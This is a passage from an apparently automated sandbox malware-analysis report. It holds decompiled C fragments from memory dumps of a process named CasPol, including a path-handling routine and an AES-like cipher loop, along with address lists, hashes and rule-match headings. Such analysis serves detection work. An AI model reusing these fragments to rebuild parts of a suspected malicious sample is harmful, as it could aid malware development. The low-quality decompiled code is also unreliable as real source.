																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = L0123AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E012695D0();
																			L012477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L012477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return L0126B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = L01263D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
                                                                                                                                                                                                                                                                                                                            								return L0126B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                                                                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                                                                            						L2:
                                                                                                                                                                                                                                                                                                                            						_t260 = _v572;
                                                                                                                                                                                                                                                                                                                            						goto L3;
                                                                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                                                                            				L101:
                                                                                                                                                                                                                                                                                                                            			}
                                                                                                                                                                                                                                                                                                                            0x01244575
                                                                                                                                                                                                                                                                                                                            0x0128e1b1
                                                                                                                                                                                                                                                                                                                            0x0128e1b1
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x0124457b
                                                                                                                                                                                                                                                                                                                            0x0124457b
                                                                                                                                                                                                                                                                                                                            0x01244582
                                                                                                                                                                                                                                                                                                                            0x0128e1ab
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x01244588
                                                                                                                                                                                                                                                                                                                            0x01244588
                                                                                                                                                                                                                                                                                                                            0x0124458c
                                                                                                                                                                                                                                                                                                                            0x0128e1c4
                                                                                                                                                                                                                                                                                                                            0x0128e1c4
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x01244592
                                                                                                                                                                                                                                                                                                                            0x01244592
                                                                                                                                                                                                                                                                                                                            0x01244599
                                                                                                                                                                                                                                                                                                                            0x0128e1be
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x0124459f
                                                                                                                                                                                                                                                                                                                            0x0124459f
                                                                                                                                                                                                                                                                                                                            0x012445a3
                                                                                                                                                                                                                                                                                                                            0x0128e1d7
                                                                                                                                                                                                                                                                                                                            0x0128e1e4
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x012445a9
                                                                                                                                                                                                                                                                                                                            0x012445a9
                                                                                                                                                                                                                                                                                                                            0x012445b0
                                                                                                                                                                                                                                                                                                                            0x0128e1d1
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x012445b6
                                                                                                                                                                                                                                                                                                                            0x012445b6
                                                                                                                                                                                                                                                                                                                            0x012445b6
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x012445b6
                                                                                                                                                                                                                                                                                                                            0x012445b0
                                                                                                                                                                                                                                                                                                                            0x012445a3
                                                                                                                                                                                                                                                                                                                            0x01244599
                                                                                                                                                                                                                                                                                                                            0x0124458c
                                                                                                                                                                                                                                                                                                                            0x01244582
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x012441f4
                                                                                                                                                                                                                                                                                                                            0x0124423e
                                                                                                                                                                                                                                                                                                                            0x01244241
                                                                                                                                                                                                                                                                                                                            0x012445c0
                                                                                                                                                                                                                                                                                                                            0x012445c4
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x012445ca
                                                                                                                                                                                                                                                                                                                            0x012445ca
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x0128e207
                                                                                                                                                                                                                                                                                                                            0x0128e20f
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x012445d1
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x012445ca
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x01244247
                                                                                                                                                                                                                                                                                                                            0x01244247
                                                                                                                                                                                                                                                                                                                            0x01244247
                                                                                                                                                                                                                                                                                                                            0x01244249
                                                                                                                                                                                                                                                                                                                            0x01244249
                                                                                                                                                                                                                                                                                                                            0x01244249
                                                                                                                                                                                                                                                                                                                            0x01244251
                                                                                                                                                                                                                                                                                                                            0x01244251
                                                                                                                                                                                                                                                                                                                            0x01244257
                                                                                                                                                                                                                                                                                                                            0x0124425f
                                                                                                                                                                                                                                                                                                                            0x0124453e
                                                                                                                                                                                                                                                                                                                            0x01244541
                                                                                                                                                                                                                                                                                                                            0x0124454a
                                                                                                                                                                                                                                                                                                                            0x0128e255
                                                                                                                                                                                                                                                                                                                            0x0128e255
                                                                                                                                                                                                                                                                                                                            0x0128e25b
                                                                                                                                                                                                                                                                                                                            0x0128e25e
                                                                                                                                                                                                                                                                                                                            0x0128e261
                                                                                                                                                                                                                                                                                                                            0x0128e261
                                                                                                                                                                                                                                                                                                                            0x01244555
                                                                                                                                                                                                                                                                                                                            0x01244559
                                                                                                                                                                                                                                                                                                                            0x0124455d
                                                                                                                                                                                                                                                                                                                            0x0128e26d
                                                                                                                                                                                                                                                                                                                            0x0128e270
                                                                                                                                                                                                                                                                                                                            0x0128e274
                                                                                                                                                                                                                                                                                                                            0x0128e27a
                                                                                                                                                                                                                                                                                                                            0x0128e27d
                                                                                                                                                                                                                                                                                                                            0x0128e28e
                                                                                                                                                                                                                                                                                                                            0x0128e28e
                                                                                                                                                                                                                                                                                                                            0x01244563
                                                                                                                                                                                                                                                                                                                            0x01244563
                                                                                                                                                                                                                                                                                                                            0x01244569
                                                                                                                                                                                                                                                                                                                            0x01244569
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x0124455d
                                                                                                                                                                                                                                                                                                                            0x0124450f
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x012444f3
                                                                                                                                                                                                                                                                                                                            0x012443ff
                                                                                                                                                                                                                                                                                                                            0x01244405
                                                                                                                                                                                                                                                                                                                            0x01244405
                                                                                                                                                                                                                                                                                                                            0x01244405
                                                                                                                                                                                                                                                                                                                            0x012442ac
                                                                                                                                                                                                                                                                                                                            0x0124428c
                                                                                                                                                                                                                                                                                                                            0x01244282
                                                                                                                                                                                                                                                                                                                            0x01244407
                                                                                                                                                                                                                                                                                                                            0x0124440d
                                                                                                                                                                                                                                                                                                                            0x0128e2af
                                                                                                                                                                                                                                                                                                                            0x0128e2af
                                                                                                                                                                                                                                                                                                                            0x01244413
                                                                                                                                                                                                                                                                                                                            0x01244413
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x012441d4
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x012441c3
                                                                                                                                                                                                                                                                                                                            0x012441bd
                                                                                                                                                                                                                                                                                                                            0x01244415
                                                                                                                                                                                                                                                                                                                            0x01244415
                                                                                                                                                                                                                                                                                                                            0x01244416
                                                                                                                                                                                                                                                                                                                            0x01244417
                                                                                                                                                                                                                                                                                                                            0x01244429
                                                                                                                                                                                                                                                                                                                            0x0124416e
                                                                                                                                                                                                                                                                                                                            0x0124416e
                                                                                                                                                                                                                                                                                                                            0x01244175
                                                                                                                                                                                                                                                                                                                            0x01244498
                                                                                                                                                                                                                                                                                                                            0x0124449f
                                                                                                                                                                                                                                                                                                                            0x0128e12d
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x0128e133
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x0128e133
                                                                                                                                                                                                                                                                                                                            0x012444a5
                                                                                                                                                                                                                                                                                                                            0x012444a5
                                                                                                                                                                                                                                                                                                                            0x012444aa
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x012444bb
                                                                                                                                                                                                                                                                                                                            0x012444ca
                                                                                                                                                                                                                                                                                                                            0x012444d6
                                                                                                                                                                                                                                                                                                                            0x012444d7
                                                                                                                                                                                                                                                                                                                            0x012444d8
                                                                                                                                                                                                                                                                                                                            0x012444e3
                                                                                                                                                                                                                                                                                                                            0x012444e3
                                                                                                                                                                                                                                                                                                                            0x012444aa
                                                                                                                                                                                                                                                                                                                            0x0124417b
                                                                                                                                                                                                                                                                                                                            0x0124417b
                                                                                                                                                                                                                                                                                                                            0x0124417b
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x0124417b
                                                                                                                                                                                                                                                                                                                            0x01244175
                                                                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_1200000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 26%
                                                                                                                                                                                                                                                                                                                            			E00405843(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
                                                                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                                                                                                                                                                            				void* _t273;
                                                                                                                                                                                                                                                                                                                            				signed int _t274;
                                                                                                                                                                                                                                                                                                                            				signed int _t282;
                                                                                                                                                                                                                                                                                                                            				signed int* _t358;
                                                                                                                                                                                                                                                                                                                            				signed int _t383;
                                                                                                                                                                                                                                                                                                                            				signed int* _t409;
                                                                                                                                                                                                                                                                                                                            				signed int _t429;
                                                                                                                                                                                                                                                                                                                            				signed int _t458;
                                                                                                                                                                                                                                                                                                                            				signed int _t478;
                                                                                                                                                                                                                                                                                                                            				signed int _t560;
                                                                                                                                                                                                                                                                                                                            				signed int _t603;
                                                                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                                                                            				_t273 = __eax;
                                                                                                                                                                                                                                                                                                                            				asm("ror edi, 0x8");
                                                                                                                                                                                                                                                                                                                            				asm("rol edx, 0x8");
                                                                                                                                                                                                                                                                                                                            				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
                                                                                                                                                                                                                                                                                                                            				asm("ror ebx, 0x8");
                                                                                                                                                                                                                                                                                                                            				asm("rol edx, 0x8");
                                                                                                                                                                                                                                                                                                                            				_v20 = _t458;
                                                                                                                                                                                                                                                                                                                            				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
                                                                                                                                                                                                                                                                                                                            				asm("ror ebx, 0x8");
                                                                                                                                                                                                                                                                                                                            				asm("rol edx, 0x8");
                                                                                                                                                                                                                                                                                                                            				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
                                                                                                                                                                                                                                                                                                                            				asm("ror esi, 0x8");
                                                                                                                                                                                                                                                                                                                            				asm("rol edx, 0x8");
                                                                                                                                                                                                                                                                                                                            				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
                                                                                                                                                                                                                                                                                                                            				asm("ror edx, 0x10");
                                                                                                                                                                                                                                                                                                                            				asm("ror esi, 0x8");
                                                                                                                                                                                                                                                                                                                            				asm("rol esi, 0x8");
                                                                                                                                                                                                                                                                                                                            				_v24 = _t282;
                                                                                                                                                                                                                                                                                                                            				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
                                                                                                                                                                                                                                                                                                                            				asm("ror esi, 0x10");
                                                                                                                                                                                                                                                                                                                            				asm("ror ebx, 0x8");
                                                                                                                                                                                                                                                                                                                            				asm("rol ebx, 0x8");
                                                                                                                                                                                                                                                                                                                            				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
                                                                                                                                                                                                                                                                                                                            				asm("ror ebx, 0x8");
                                                                                                                                                                                                                                                                                                                            				asm("ror edi, 0x10");
                                                                                                                                                                                                                                                                                                                            				asm("rol edi, 0x8");
                                                                                                                                                                                                                                                                                                                            				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
                                                                                                                                                                                                                                                                                                                            				asm("ror edi, 0x10");
                                                                                                                                                                                                                                                                                                                            				asm("ror ebx, 0x8");
                                                                                                                                                                                                                                                                                                                            				asm("rol ebx, 0x8");
                                                                                                                                                                                                                                                                                                                            				_t409 =  &(__ecx[8]);
                                                                                                                                                                                                                                                                                                                            				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
                                                                                                                                                                                                                                                                                                                            				_t478 = (_a4 >> 1) - 1;
                                                                                                                                                                                                                                                                                                                            				_a4 = _t478;
                                                                                                                                                                                                                                                                                                                            				if(_t478 != 0) {
                                                                                                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                                                                                                            						asm("ror edi, 0x10");
                                                                                                                                                                                                                                                                                                                            						asm("ror ebx, 0x8");
                                                                                                                                                                                                                                                                                                                            						asm("rol ebx, 0x8");
                                                                                                                                                                                                                                                                                                                            						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
                                                                                                                                                                                                                                                                                                                            						asm("ror edi, 0x10");
                                                                                                                                                                                                                                                                                                                            						asm("ror ebx, 0x8");
                                                                                                                                                                                                                                                                                                                            						asm("rol ebx, 0x8");
                                                                                                                                                                                                                                                                                                                            						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
                                                                                                                                                                                                                                                                                                                            						asm("ror ebx, 0x8");
                                                                                                                                                                                                                                                                                                                            						asm("ror edi, 0x10");
                                                                                                                                                                                                                                                                                                                            						asm("rol edi, 0x8");
                                                                                                                                                                                                                                                                                                                            						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
                                                                                                                                                                                                                                                                                                                            						asm("ror edi, 0x10");
                                                                                                                                                                                                                                                                                                                            						asm("ror edx, 0x8");
                                                                                                                                                                                                                                                                                                                            						asm("rol edx, 0x8");
                                                                                                                                                                                                                                                                                                                            						_v24 = _t383;
                                                                                                                                                                                                                                                                                                                            						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
                                                                                                                                                                                                                                                                                                                            						asm("ror edx, 0x10");
                                                                                                                                                                                                                                                                                                                            						asm("ror esi, 0x8");
                                                                                                                                                                                                                                                                                                                            						asm("rol esi, 0x8");
                                                                                                                                                                                                                                                                                                                            						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
                                                                                                                                                                                                                                                                                                                            						asm("ror esi, 0x10");
                                                                                                                                                                                                                                                                                                                            						asm("ror ebx, 0x8");
                                                                                                                                                                                                                                                                                                                            						asm("rol ebx, 0x8");
                                                                                                                                                                                                                                                                                                                            						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
                                                                                                                                                                                                                                                                                                                            						_v12 = _t560;
                                                                                                                                                                                                                                                                                                                            						asm("ror edi, 0x8");
                                                                                                                                                                                                                                                                                                                            						asm("ror ebx, 0x10");
                                                                                                                                                                                                                                                                                                                            						asm("rol ebx, 0x8");
                                                                                                                                                                                                                                                                                                                            						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
                                                                                                                                                                                                                                                                                                                            						asm("ror ebx, 0x10");
                                                                                                                                                                                                                                                                                                                            						asm("ror edi, 0x8");
                                                                                                                                                                                                                                                                                                                            						asm("rol edi, 0x8");
                                                                                                                                                                                                                                                                                                                            						_t409 =  &(_t409[8]);
                                                                                                                                                                                                                                                                                                                            						_t205 =  &_a4;
                                                                                                                                                                                                                                                                                                                            						 *_t205 = _a4 - 1;
                                                                                                                                                                                                                                                                                                                            						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
                                                                                                                                                                                                                                                                                                                            					} while ( *_t205 != 0);
                                                                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                                                                            				asm("ror ebx, 0x8");
                                                                                                                                                                                                                                                                                                                            				asm("rol edi, 0x8");
                                                                                                                                                                                                                                                                                                                            				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
                                                                                                                                                                                                                                                                                                                            				asm("ror ebx, 0x8");
                                                                                                                                                                                                                                                                                                                            				asm("rol edi, 0x8");
                                                                                                                                                                                                                                                                                                                            				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
                                                                                                                                                                                                                                                                                                                            				asm("ror ebx, 0x8");
                                                                                                                                                                                                                                                                                                                            				asm("rol edi, 0x8");
                                                                                                                                                                                                                                                                                                                            				_t358 = _a8;
                                                                                                                                                                                                                                                                                                                            				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
                                                                                                                                                                                                                                                                                                                            				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
                                                                                                                                                                                                                                                                                                                            				asm("ror ecx, 0x8");
                                                                                                                                                                                                                                                                                                                            				asm("rol edi, 0x8");
                                                                                                                                                                                                                                                                                                                            				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
                                                                                                                                                                                                                                                                                                                            				return _t274;
                                                                                                                                                                                                                                                                                                                            			}
                                                                                                                                                                                                                                                                                                                            0x00405c71
                                                                                                                                                                                                                                                                                                                            0x00405c77
                                                                                                                                                                                                                                                                                                                            0x00405c77
                                                                                                                                                                                                                                                                                                                            0x00405c7a
                                                                                                                                                                                                                                                                                                                            0x00405c7a
                                                                                                                                                                                                                                                                                                                            0x00405a13
                                                                                                                                                                                                                                                                                                                            0x00405cde
                                                                                                                                                                                                                                                                                                                            0x00405ce7
                                                                                                                                                                                                                                                                                                                            0x00405cf5
                                                                                                                                                                                                                                                                                                                            0x00405d53
                                                                                                                                                                                                                                                                                                                            0x00405d5c
                                                                                                                                                                                                                                                                                                                            0x00405d6a
                                                                                                                                                                                                                                                                                                                            0x00405dcc
                                                                                                                                                                                                                                                                                                                            0x00405dd5
                                                                                                                                                                                                                                                                                                                            0x00405de2
                                                                                                                                                                                                                                                                                                                            0x00405de5
                                                                                                                                                                                                                                                                                                                            0x00405e31
                                                                                                                                                                                                                                                                                                                            0x00405e3d
                                                                                                                                                                                                                                                                                                                            0x00405e46
                                                                                                                                                                                                                                                                                                                            0x00405e53
                                                                                                                                                                                                                                                                                                                            0x00405e5a

                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 70a1f4048452d61e395e339dec46de454370745690d9b2d6a67eb6b7bf2bc473
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8026E73E547164FE720DE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 55%
                                                                                                                                                                                                                                                                                                                            			E00421A58() {
                                                                                                                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                                                                                                                            				void* _t36;
                                                                                                                                                                                                                                                                                                                            				intOrPtr _t37;
                                                                                                                                                                                                                                                                                                                            				intOrPtr _t39;
                                                                                                                                                                                                                                                                                                                            				intOrPtr _t40;
                                                                                                                                                                                                                                                                                                                            				signed char _t44;
                                                                                                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                                                                                                            				signed char _t47;
                                                                                                                                                                                                                                                                                                                            				void* _t50;
                                                                                                                                                                                                                                                                                                                            				signed int _t51;
                                                                                                                                                                                                                                                                                                                            				signed int _t52;
